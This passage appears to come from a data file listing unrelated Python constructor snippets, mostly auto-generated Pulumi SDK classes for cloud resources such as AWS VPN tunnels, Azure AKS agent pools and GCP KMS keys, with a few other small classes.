pulumi.set(__self__, \"tunnel2_dpd_timeout_action\", tunnel2_dpd_timeout_action)\n if tunnel2_dpd_timeout_seconds is not None:\n pulumi.set(__self__, \"tunnel2_dpd_timeout_seconds\", tunnel2_dpd_timeout_seconds)\n if tunnel2_enable_tunnel_lifecycle_control is not None:\n pulumi.set(__self__, \"tunnel2_enable_tunnel_lifecycle_control\", tunnel2_enable_tunnel_lifecycle_control)\n if tunnel2_ike_versions is not None:\n pulumi.set(__self__, \"tunnel2_ike_versions\", tunnel2_ike_versions)\n if tunnel2_inside_cidr is not None:\n pulumi.set(__self__, \"tunnel2_inside_cidr\", tunnel2_inside_cidr)\n if tunnel2_inside_ipv6_cidr is not None:\n pulumi.set(__self__, \"tunnel2_inside_ipv6_cidr\", tunnel2_inside_ipv6_cidr)\n if tunnel2_log_options is not None:\n pulumi.set(__self__, \"tunnel2_log_options\", tunnel2_log_options)\n if tunnel2_phase1_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel2_phase1_dh_group_numbers\", tunnel2_phase1_dh_group_numbers)\n if tunnel2_phase1_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase1_encryption_algorithms\", tunnel2_phase1_encryption_algorithms)\n if tunnel2_phase1_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase1_integrity_algorithms\", tunnel2_phase1_integrity_algorithms)\n if tunnel2_phase1_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel2_phase1_lifetime_seconds\", tunnel2_phase1_lifetime_seconds)\n if tunnel2_phase2_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel2_phase2_dh_group_numbers\", tunnel2_phase2_dh_group_numbers)\n if tunnel2_phase2_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase2_encryption_algorithms\", tunnel2_phase2_encryption_algorithms)\n if tunnel2_phase2_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase2_integrity_algorithms\", tunnel2_phase2_integrity_algorithms)\n if tunnel2_phase2_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel2_phase2_lifetime_seconds\", tunnel2_phase2_lifetime_seconds)\n if tunnel2_preshared_key is not None:\n pulumi.set(__self__, \"tunnel2_preshared_key\", tunnel2_preshared_key)\n if tunnel2_rekey_fuzz_percentage is not None:\n pulumi.set(__self__, \"tunnel2_rekey_fuzz_percentage\", tunnel2_rekey_fuzz_percentage)\n if tunnel2_rekey_margin_time_seconds is not None:\n pulumi.set(__self__, \"tunnel2_rekey_margin_time_seconds\", tunnel2_rekey_margin_time_seconds)\n if tunnel2_replay_window_size is not None:\n pulumi.set(__self__, \"tunnel2_replay_window_size\", tunnel2_replay_window_size)\n if tunnel2_startup_action is not None:\n pulumi.set(__self__, \"tunnel2_startup_action\", tunnel2_startup_action)\n if tunnel2_vgw_inside_address is not None:\n pulumi.set(__self__, \"tunnel2_vgw_inside_address\", tunnel2_vgw_inside_address)\n if tunnel_inside_ip_version is not None:\n pulumi.set(__self__, \"tunnel_inside_ip_version\", tunnel_inside_ip_version)\n if type is not None:\n pulumi.set(__self__, \"type\", type)\n if vgw_telemetries is not None:\n pulumi.set(__self__, \"vgw_telemetries\", vgw_telemetries)\n if vpn_gateway_id is not None:\n pulumi.set(__self__, \"vpn_gateway_id\", vpn_gateway_id)", "def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n instance_id: Optional[pulumi.Input[int]] = None,\n __props__=None):\n ...", "def __init__(__self__, *,\n connection_prefix: Optional[pulumi.Input[str]] = None,\n connection_string: Optional[pulumi.Input[str]] = None,\n distribution_type: Optional[pulumi.Input[str]] = None,\n instance_id: 
Optional[pulumi.Input[str]] = None,\n max_delay_time: Optional[pulumi.Input[int]] = None,\n port: Optional[pulumi.Input[int]] = None,\n weight: Optional[pulumi.Input[Mapping[str, Any]]] = None):\n if connection_prefix is not None:\n pulumi.set(__self__, \"connection_prefix\", connection_prefix)\n if connection_string is not None:\n pulumi.set(__self__, \"connection_string\", connection_string)\n if distribution_type is not None:\n pulumi.set(__self__, \"distribution_type\", distribution_type)\n if instance_id is not None:\n pulumi.set(__self__, \"instance_id\", instance_id)\n if max_delay_time is not None:\n pulumi.set(__self__, \"max_delay_time\", max_delay_time)\n if port is not None:\n pulumi.set(__self__, \"port\", port)\n if weight is not None:\n pulumi.set(__self__, \"weight\", weight)", "def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n auto_renew: Optional[pulumi.Input[bool]] = None,\n auto_renew_period: Optional[pulumi.Input[int]] = None,\n cluster_name: Optional[pulumi.Input[str]] = None,\n data_center_name: Optional[pulumi.Input[str]] = None,\n disk_size: Optional[pulumi.Input[int]] = None,\n disk_type: Optional[pulumi.Input[str]] = None,\n enable_public: Optional[pulumi.Input[bool]] = None,\n instance_type: Optional[pulumi.Input[str]] = None,\n ip_white: Optional[pulumi.Input[str]] = None,\n maintain_end_time: Optional[pulumi.Input[str]] = None,\n maintain_start_time: Optional[pulumi.Input[str]] = None,\n major_version: Optional[pulumi.Input[str]] = None,\n node_count: Optional[pulumi.Input[int]] = None,\n password: Optional[pulumi.Input[str]] = None,\n pay_type: Optional[pulumi.Input[str]] = None,\n period: Optional[pulumi.Input[int]] = None,\n period_unit: Optional[pulumi.Input[str]] = None,\n security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,\n vswitch_id: Optional[pulumi.Input[str]] = None,\n zone_id: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...", "def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n description: Optional[pulumi.Input[str]] = None,\n kms_key: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n schedule_config: Optional[pulumi.Input[pulumi.InputType['DataIntegrationScheduleConfigArgs']]] = None,\n source_uri: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n __props__=None):\n ...", "def __init__(__self__, *,\n app_name: pulumi.Input[str],\n product_id: pulumi.Input[str],\n type: pulumi.Input[str],\n bundle_id: Optional[pulumi.Input[str]] = None,\n encoded_icon: Optional[pulumi.Input[str]] = None,\n industry_id: Optional[pulumi.Input[str]] = None,\n package_name: Optional[pulumi.Input[str]] = None):\n pulumi.set(__self__, \"app_name\", app_name)\n pulumi.set(__self__, \"product_id\", product_id)\n pulumi.set(__self__, \"type\", type)\n if bundle_id is not None:\n pulumi.set(__self__, \"bundle_id\", bundle_id)\n if encoded_icon is not None:\n pulumi.set(__self__, \"encoded_icon\", encoded_icon)\n if industry_id is not None:\n pulumi.set(__self__, \"industry_id\", industry_id)\n if package_name is not None:\n pulumi.set(__self__, \"package_name\", package_name)", "def __init__(__self__, *,\n algorithm: str,\n attestation: 'outputs.KeyOperationAttestationResponse',\n create_time: str,\n destroy_event_time: str,\n destroy_time: str,\n external_protection_level_options: 
'outputs.ExternalProtectionLevelOptionsResponse',\n generate_time: str,\n import_failure_reason: str,\n import_job: str,\n import_time: str,\n name: str,\n protection_level: str,\n reimport_eligible: bool,\n state: str):\n pulumi.set(__self__, \"algorithm\", algorithm)\n pulumi.set(__self__, \"attestation\", attestation)\n pulumi.set(__self__, \"create_time\", create_time)\n pulumi.set(__self__, \"destroy_event_time\", destroy_event_time)\n pulumi.set(__self__, \"destroy_time\", destroy_time)\n pulumi.set(__self__, \"external_protection_level_options\", external_protection_level_options)\n pulumi.set(__self__, \"generate_time\", generate_time)\n pulumi.set(__self__, \"import_failure_reason\", import_failure_reason)\n pulumi.set(__self__, \"import_job\", import_job)\n pulumi.set(__self__, \"import_time\", import_time)\n pulumi.set(__self__, \"name\", name)\n pulumi.set(__self__, \"protection_level\", protection_level)\n pulumi.set(__self__, \"reimport_eligible\", reimport_eligible)\n pulumi.set(__self__, \"state\", state)", "def __init__(__self__, *,\n instance: pulumi.Input[str],\n charset: Optional[pulumi.Input[str]] = None,\n collation: Optional[pulumi.Input[str]] = None,\n deletion_policy: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n project: Optional[pulumi.Input[str]] = None):\n pulumi.set(__self__, \"instance\", instance)\n if charset is not None:\n pulumi.set(__self__, \"charset\", charset)\n if collation is not None:\n pulumi.set(__self__, \"collation\", collation)\n if deletion_policy is not None:\n pulumi.set(__self__, \"deletion_policy\", deletion_policy)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if project is not None:\n pulumi.set(__self__, \"project\", project)", "def __init__(self, attributes=None, aux_input_type1=None, aux_input_type10=None, aux_input_type2=None, aux_input_type3=None, aux_input_type4=None, aux_input_type5=None, aux_input_type6=None, aux_input_type7=None, aux_input_type8=None, aux_input_type9=None, engine_hours=None, external_ids=None, gateway_serial=None, harsh_acceleration_setting_type=None, license_plate=None, name=None, notes=None, odometer_meters=None, static_assigned_driver_id=None, tag_ids=None, vin=None, local_vars_configuration=None): # noqa: E501 # noqa: E501\n if local_vars_configuration is None:\n local_vars_configuration = Configuration()\n self.local_vars_configuration = local_vars_configuration\n\n self._attributes = None\n self._aux_input_type1 = None\n self._aux_input_type10 = None\n self._aux_input_type2 = None\n self._aux_input_type3 = None\n self._aux_input_type4 = None\n self._aux_input_type5 = None\n self._aux_input_type6 = None\n self._aux_input_type7 = None\n self._aux_input_type8 = None\n self._aux_input_type9 = None\n self._engine_hours = None\n self._external_ids = None\n self._gateway_serial = None\n self._harsh_acceleration_setting_type = None\n self._license_plate = None\n self._name = None\n self._notes = None\n self._odometer_meters = None\n self._static_assigned_driver_id = None\n self._tag_ids = None\n self._vin = None\n self.discriminator = None\n\n if attributes is not None:\n self.attributes = attributes\n if aux_input_type1 is not None:\n self.aux_input_type1 = aux_input_type1\n if aux_input_type10 is not None:\n self.aux_input_type10 = aux_input_type10\n if aux_input_type2 is not None:\n self.aux_input_type2 = aux_input_type2\n if aux_input_type3 is not None:\n self.aux_input_type3 = aux_input_type3\n if aux_input_type4 is not None:\n self.aux_input_type4 = 
aux_input_type4\n if aux_input_type5 is not None:\n self.aux_input_type5 = aux_input_type5\n if aux_input_type6 is not None:\n self.aux_input_type6 = aux_input_type6\n if aux_input_type7 is not None:\n self.aux_input_type7 = aux_input_type7\n if aux_input_type8 is not None:\n self.aux_input_type8 = aux_input_type8\n if aux_input_type9 is not None:\n self.aux_input_type9 = aux_input_type9\n if engine_hours is not None:\n self.engine_hours = engine_hours\n if external_ids is not None:\n self.external_ids = external_ids\n if gateway_serial is not None:\n self.gateway_serial = gateway_serial\n if harsh_acceleration_setting_type is not None:\n self.harsh_acceleration_setting_type = harsh_acceleration_setting_type\n if license_plate is not None:\n self.license_plate = license_plate\n if name is not None:\n self.name = name\n if notes is not None:\n self.notes = notes\n if odometer_meters is not None:\n self.odometer_meters = odometer_meters\n if static_assigned_driver_id is not None:\n self.static_assigned_driver_id = static_assigned_driver_id\n if tag_ids is not None:\n self.tag_ids = tag_ids\n if vin is not None:\n self.vin = vin", "def __init__(__self__, *,\n name: pulumi.Input[str],\n args: Optional[pulumi.Input[str]] = None):\n pulumi.set(__self__, \"name\", name)\n if args is not None:\n pulumi.set(__self__, \"args\", args)", "def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n name: Optional[pulumi.Input[str]] = None,\n priority: Optional[pulumi.Input[str]] = None,\n ttl: Optional[pulumi.Input[str]] = None,\n type: Optional[pulumi.Input[str]] = None,\n value: Optional[pulumi.Input[str]] = None,\n zone_name: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...", "def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n app_name: Optional[pulumi.Input[str]] = None,\n bundle_id: Optional[pulumi.Input[str]] = None,\n encoded_icon: Optional[pulumi.Input[str]] = None,\n industry_id: Optional[pulumi.Input[str]] = None,\n package_name: Optional[pulumi.Input[str]] = None,\n product_id: Optional[pulumi.Input[str]] = None,\n type: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...", "def __init__(__self__, *,\n name: pulumi.Input[str],\n availability_zones: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n capacity_reservation_group_id: Optional[pulumi.Input[str]] = None,\n count: Optional[pulumi.Input[int]] = None,\n creation_data: Optional[pulumi.Input['CreationDataArgs']] = None,\n enable_auto_scaling: Optional[pulumi.Input[bool]] = None,\n enable_custom_ca_trust: Optional[pulumi.Input[bool]] = None,\n enable_encryption_at_host: Optional[pulumi.Input[bool]] = None,\n enable_fips: Optional[pulumi.Input[bool]] = None,\n enable_node_public_ip: Optional[pulumi.Input[bool]] = None,\n enable_ultra_ssd: Optional[pulumi.Input[bool]] = None,\n gpu_instance_profile: Optional[pulumi.Input[Union[str, 'GPUInstanceProfile']]] = None,\n host_group_id: Optional[pulumi.Input[str]] = None,\n kubelet_config: Optional[pulumi.Input['KubeletConfigArgs']] = None,\n kubelet_disk_type: Optional[pulumi.Input[Union[str, 'KubeletDiskType']]] = None,\n linux_os_config: Optional[pulumi.Input['LinuxOSConfigArgs']] = None,\n max_count: Optional[pulumi.Input[int]] = None,\n max_pods: Optional[pulumi.Input[int]] = None,\n message_of_the_day: Optional[pulumi.Input[str]] = None,\n min_count: Optional[pulumi.Input[int]] = None,\n mode: Optional[pulumi.Input[Union[str, 'AgentPoolMode']]] = None,\n network_profile: 
Optional[pulumi.Input['AgentPoolNetworkProfileArgs']] = None,\n node_labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n node_public_ip_prefix_id: Optional[pulumi.Input[str]] = None,\n node_taints: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n orchestrator_version: Optional[pulumi.Input[str]] = None,\n os_disk_size_gb: Optional[pulumi.Input[int]] = None,\n os_disk_type: Optional[pulumi.Input[Union[str, 'OSDiskType']]] = None,\n os_sku: Optional[pulumi.Input[Union[str, 'OSSKU']]] = None,\n os_type: Optional[pulumi.Input[Union[str, 'OSType']]] = None,\n pod_subnet_id: Optional[pulumi.Input[str]] = None,\n power_state: Optional[pulumi.Input['PowerStateArgs']] = None,\n proximity_placement_group_id: Optional[pulumi.Input[str]] = None,\n scale_down_mode: Optional[pulumi.Input[Union[str, 'ScaleDownMode']]] = None,\n scale_set_eviction_policy: Optional[pulumi.Input[Union[str, 'ScaleSetEvictionPolicy']]] = None,\n scale_set_priority: Optional[pulumi.Input[Union[str, 'ScaleSetPriority']]] = None,\n security_profile: Optional[pulumi.Input['AgentPoolSecurityProfileArgs']] = None,\n spot_max_price: Optional[pulumi.Input[float]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n type: Optional[pulumi.Input[Union[str, 'AgentPoolType']]] = None,\n upgrade_settings: Optional[pulumi.Input['AgentPoolUpgradeSettingsArgs']] = None,\n vm_size: Optional[pulumi.Input[str]] = None,\n vnet_subnet_id: Optional[pulumi.Input[str]] = None,\n windows_profile: Optional[pulumi.Input['AgentPoolWindowsProfileArgs']] = None,\n workload_runtime: Optional[pulumi.Input[Union[str, 'WorkloadRuntime']]] = None):\n pulumi.set(__self__, \"name\", name)\n if availability_zones is not None:\n pulumi.set(__self__, \"availability_zones\", availability_zones)\n if capacity_reservation_group_id is not None:\n pulumi.set(__self__, \"capacity_reservation_group_id\", capacity_reservation_group_id)\n if count is not None:\n pulumi.set(__self__, \"count\", count)\n if creation_data is not None:\n pulumi.set(__self__, \"creation_data\", creation_data)\n if enable_auto_scaling is not None:\n pulumi.set(__self__, \"enable_auto_scaling\", enable_auto_scaling)\n if enable_custom_ca_trust is not None:\n pulumi.set(__self__, \"enable_custom_ca_trust\", enable_custom_ca_trust)\n if enable_encryption_at_host is not None:\n pulumi.set(__self__, \"enable_encryption_at_host\", enable_encryption_at_host)\n if enable_fips is not None:\n pulumi.set(__self__, \"enable_fips\", enable_fips)\n if enable_node_public_ip is not None:\n pulumi.set(__self__, \"enable_node_public_ip\", enable_node_public_ip)\n if enable_ultra_ssd is not None:\n pulumi.set(__self__, \"enable_ultra_ssd\", enable_ultra_ssd)\n if gpu_instance_profile is not None:\n pulumi.set(__self__, \"gpu_instance_profile\", gpu_instance_profile)\n if host_group_id is not None:\n pulumi.set(__self__, \"host_group_id\", host_group_id)\n if kubelet_config is not None:\n pulumi.set(__self__, \"kubelet_config\", kubelet_config)\n if kubelet_disk_type is not None:\n pulumi.set(__self__, \"kubelet_disk_type\", kubelet_disk_type)\n if linux_os_config is not None:\n pulumi.set(__self__, \"linux_os_config\", linux_os_config)\n if max_count is not None:\n pulumi.set(__self__, \"max_count\", max_count)\n if max_pods is not None:\n pulumi.set(__self__, \"max_pods\", max_pods)\n if message_of_the_day is not None:\n pulumi.set(__self__, \"message_of_the_day\", message_of_the_day)\n if min_count is not None:\n pulumi.set(__self__, \"min_count\", 
min_count)\n if mode is not None:\n pulumi.set(__self__, \"mode\", mode)\n if network_profile is not None:\n pulumi.set(__self__, \"network_profile\", network_profile)\n if node_labels is not None:\n pulumi.set(__self__, \"node_labels\", node_labels)\n if node_public_ip_prefix_id is not None:\n pulumi.set(__self__, \"node_public_ip_prefix_id\", node_public_ip_prefix_id)\n if node_taints is not None:\n pulumi.set(__self__, \"node_taints\", node_taints)\n if orchestrator_version is not None:\n pulumi.set(__self__, \"orchestrator_version\", orchestrator_version)\n if os_disk_size_gb is not None:\n pulumi.set(__self__, \"os_disk_size_gb\", os_disk_size_gb)\n if os_disk_type is not None:\n pulumi.set(__self__, \"os_disk_type\", os_disk_type)\n if os_sku is not None:\n pulumi.set(__self__, \"os_sku\", os_sku)\n if os_type is not None:\n pulumi.set(__self__, \"os_type\", os_type)\n if pod_subnet_id is not None:\n pulumi.set(__self__, \"pod_subnet_id\", pod_subnet_id)\n if power_state is not None:\n pulumi.set(__self__, \"power_state\", power_state)\n if proximity_placement_group_id is not None:\n pulumi.set(__self__, \"proximity_placement_group_id\", proximity_placement_group_id)\n if scale_down_mode is not None:\n pulumi.set(__self__, \"scale_down_mode\", scale_down_mode)\n if scale_set_eviction_policy is not None:\n pulumi.set(__self__, \"scale_set_eviction_policy\", scale_set_eviction_policy)\n if scale_set_priority is not None:\n pulumi.set(__self__, \"scale_set_priority\", scale_set_priority)\n if security_profile is not None:\n pulumi.set(__self__, \"security_profile\", security_profile)\n if spot_max_price is not None:\n pulumi.set(__self__, \"spot_max_price\", spot_max_price)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if type is not None:\n pulumi.set(__self__, \"type\", type)\n if upgrade_settings is not None:\n pulumi.set(__self__, \"upgrade_settings\", upgrade_settings)\n if vm_size is not None:\n pulumi.set(__self__, \"vm_size\", vm_size)\n if vnet_subnet_id is not None:\n pulumi.set(__self__, \"vnet_subnet_id\", vnet_subnet_id)\n if windows_profile is not None:\n pulumi.set(__self__, \"windows_profile\", windows_profile)\n if workload_runtime is not None:\n pulumi.set(__self__, \"workload_runtime\", workload_runtime)", "def __init__(__self__, *,\n instance_id: pulumi.Input[int]):\n pulumi.set(__self__, \"instance_id\", instance_id)", "def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n config: Optional[pulumi.Input[pulumi.InputType['ConfigArgs']]] = None,\n instance_id: Optional[pulumi.Input[str]] = None,\n location: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n project: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...", "def __init__(__self__, *,\n name: pulumi.Input[str]):\n pulumi.set(__self__, \"name\", name)", "def __init__(self, name, fuel, reliability):\n super().__init__(name, fuel)\n self.reliability = reliability", "def __init__(self, chain_instance, *args, **kwargs):\n protocol_logger('Intializing protocol processor')\n self.chain_instance = chain_instance", "def __init__(__self__, *,\n apply_immediately: Optional[pulumi.Input[bool]] = None,\n arn: Optional[pulumi.Input[str]] = None,\n authentication_strategy: Optional[pulumi.Input[str]] = None,\n auto_minor_version_upgrade: Optional[pulumi.Input[bool]] = None,\n broker_name: Optional[pulumi.Input[str]] = None,\n configuration: Optional[pulumi.Input['BrokerConfigurationArgs']] = None,\n deployment_mode: 
Optional[pulumi.Input[str]] = None,\n encryption_options: Optional[pulumi.Input['BrokerEncryptionOptionsArgs']] = None,\n engine_type: Optional[pulumi.Input[str]] = None,\n engine_version: Optional[pulumi.Input[str]] = None,\n host_instance_type: Optional[pulumi.Input[str]] = None,\n instances: Optional[pulumi.Input[Sequence[pulumi.Input['BrokerInstanceArgs']]]] = None,\n ldap_server_metadata: Optional[pulumi.Input['BrokerLdapServerMetadataArgs']] = None,\n logs: Optional[pulumi.Input['BrokerLogsArgs']] = None,\n maintenance_window_start_time: Optional[pulumi.Input['BrokerMaintenanceWindowStartTimeArgs']] = None,\n publicly_accessible: Optional[pulumi.Input[bool]] = None,\n security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n storage_type: Optional[pulumi.Input[str]] = None,\n subnet_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n users: Optional[pulumi.Input[Sequence[pulumi.Input['BrokerUserArgs']]]] = None):\n if apply_immediately is not None:\n pulumi.set(__self__, \"apply_immediately\", apply_immediately)\n if arn is not None:\n pulumi.set(__self__, \"arn\", arn)\n if authentication_strategy is not None:\n pulumi.set(__self__, \"authentication_strategy\", authentication_strategy)\n if auto_minor_version_upgrade is not None:\n pulumi.set(__self__, \"auto_minor_version_upgrade\", auto_minor_version_upgrade)\n if broker_name is not None:\n pulumi.set(__self__, \"broker_name\", broker_name)\n if configuration is not None:\n pulumi.set(__self__, \"configuration\", configuration)\n if deployment_mode is not None:\n pulumi.set(__self__, \"deployment_mode\", deployment_mode)\n if encryption_options is not None:\n pulumi.set(__self__, \"encryption_options\", encryption_options)\n if engine_type is not None:\n pulumi.set(__self__, \"engine_type\", engine_type)\n if engine_version is not None:\n pulumi.set(__self__, \"engine_version\", engine_version)\n if host_instance_type is not None:\n pulumi.set(__self__, \"host_instance_type\", host_instance_type)\n if instances is not None:\n pulumi.set(__self__, \"instances\", instances)\n if ldap_server_metadata is not None:\n pulumi.set(__self__, \"ldap_server_metadata\", ldap_server_metadata)\n if logs is not None:\n pulumi.set(__self__, \"logs\", logs)\n if maintenance_window_start_time is not None:\n pulumi.set(__self__, \"maintenance_window_start_time\", maintenance_window_start_time)\n if publicly_accessible is not None:\n pulumi.set(__self__, \"publicly_accessible\", publicly_accessible)\n if security_groups is not None:\n pulumi.set(__self__, \"security_groups\", security_groups)\n if storage_type is not None:\n pulumi.set(__self__, \"storage_type\", storage_type)\n if subnet_ids is not None:\n pulumi.set(__self__, \"subnet_ids\", subnet_ids)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if tags_all is not None:\n pulumi.set(__self__, \"tags_all\", tags_all)\n if users is not None:\n pulumi.set(__self__, \"users\", users)", "def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n arp: Optional[pulumi.Input[bool]] = None,\n control_node_id: Optional[pulumi.Input[str]] = None,\n display_name: Optional[pulumi.Input[str]] = None,\n honeypot_bind_lists: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['HoneypotProbeHoneypotBindListArgs']]]]] = None,\n ping: Optional[pulumi.Input[bool]] = 
None,\n probe_type: Optional[pulumi.Input[str]] = None,\n probe_version: Optional[pulumi.Input[str]] = None,\n proxy_ip: Optional[pulumi.Input[str]] = None,\n service_ip_lists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n uuid: Optional[pulumi.Input[str]] = None,\n vpc_id: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...", "def __init__(__self__, *,\n key: pulumi.Input[bool],\n name: pulumi.Input[str],\n required: pulumi.Input[bool],\n secret: pulumi.Input[bool],\n description: Optional[pulumi.Input[str]] = None,\n queryable: Optional[pulumi.Input[bool]] = None,\n type: Optional[pulumi.Input[str]] = None):\n pulumi.set(__self__, \"key\", key)\n pulumi.set(__self__, \"name\", name)\n pulumi.set(__self__, \"required\", required)\n pulumi.set(__self__, \"secret\", secret)\n if description is not None:\n pulumi.set(__self__, \"description\", description)\n if queryable is not None:\n pulumi.set(__self__, \"queryable\", queryable)\n if type is not None:\n pulumi.set(__self__, \"type\", type)", "def __init__(__self__, *,\n customer_gateway_id: pulumi.Input[str],\n type: pulumi.Input[str],\n enable_acceleration: Optional[pulumi.Input[bool]] = None,\n local_ipv4_network_cidr: Optional[pulumi.Input[str]] = None,\n local_ipv6_network_cidr: Optional[pulumi.Input[str]] = None,\n outside_ip_address_type: Optional[pulumi.Input[str]] = None,\n remote_ipv4_network_cidr: Optional[pulumi.Input[str]] = None,\n remote_ipv6_network_cidr: Optional[pulumi.Input[str]] = None,\n static_routes_only: Optional[pulumi.Input[bool]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n transit_gateway_id: Optional[pulumi.Input[str]] = None,\n transport_transit_gateway_attachment_id: Optional[pulumi.Input[str]] = None,\n tunnel1_dpd_timeout_action: Optional[pulumi.Input[str]] = None,\n tunnel1_dpd_timeout_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_enable_tunnel_lifecycle_control: Optional[pulumi.Input[bool]] = None,\n tunnel1_ike_versions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_inside_cidr: Optional[pulumi.Input[str]] = None,\n tunnel1_inside_ipv6_cidr: Optional[pulumi.Input[str]] = None,\n tunnel1_log_options: Optional[pulumi.Input['VpnConnectionTunnel1LogOptionsArgs']] = None,\n tunnel1_phase1_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel1_phase1_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase1_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase1_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_phase2_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel1_phase2_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase2_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase2_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_preshared_key: Optional[pulumi.Input[str]] = None,\n tunnel1_rekey_fuzz_percentage: Optional[pulumi.Input[int]] = None,\n tunnel1_rekey_margin_time_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_replay_window_size: Optional[pulumi.Input[int]] = None,\n tunnel1_startup_action: Optional[pulumi.Input[str]] = None,\n tunnel2_dpd_timeout_action: Optional[pulumi.Input[str]] = None,\n tunnel2_dpd_timeout_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_enable_tunnel_lifecycle_control: Optional[pulumi.Input[bool]] = 
None,\n tunnel2_ike_versions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_inside_cidr: Optional[pulumi.Input[str]] = None,\n tunnel2_inside_ipv6_cidr: Optional[pulumi.Input[str]] = None,\n tunnel2_log_options: Optional[pulumi.Input['VpnConnectionTunnel2LogOptionsArgs']] = None,\n tunnel2_phase1_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel2_phase1_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase1_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase1_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_phase2_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel2_phase2_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase2_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase2_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_preshared_key: Optional[pulumi.Input[str]] = None,\n tunnel2_rekey_fuzz_percentage: Optional[pulumi.Input[int]] = None,\n tunnel2_rekey_margin_time_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_replay_window_size: Optional[pulumi.Input[int]] = None,\n tunnel2_startup_action: Optional[pulumi.Input[str]] = None,\n tunnel_inside_ip_version: Optional[pulumi.Input[str]] = None,\n vpn_gateway_id: Optional[pulumi.Input[str]] = None):\n pulumi.set(__self__, \"customer_gateway_id\", customer_gateway_id)\n pulumi.set(__self__, \"type\", type)\n if enable_acceleration is not None:\n pulumi.set(__self__, \"enable_acceleration\", enable_acceleration)\n if local_ipv4_network_cidr is not None:\n pulumi.set(__self__, \"local_ipv4_network_cidr\", local_ipv4_network_cidr)\n if local_ipv6_network_cidr is not None:\n pulumi.set(__self__, \"local_ipv6_network_cidr\", local_ipv6_network_cidr)\n if outside_ip_address_type is not None:\n pulumi.set(__self__, \"outside_ip_address_type\", outside_ip_address_type)\n if remote_ipv4_network_cidr is not None:\n pulumi.set(__self__, \"remote_ipv4_network_cidr\", remote_ipv4_network_cidr)\n if remote_ipv6_network_cidr is not None:\n pulumi.set(__self__, \"remote_ipv6_network_cidr\", remote_ipv6_network_cidr)\n if static_routes_only is not None:\n pulumi.set(__self__, \"static_routes_only\", static_routes_only)\n if tags is not None:\n pulumi.set(__self__, \"tags\", 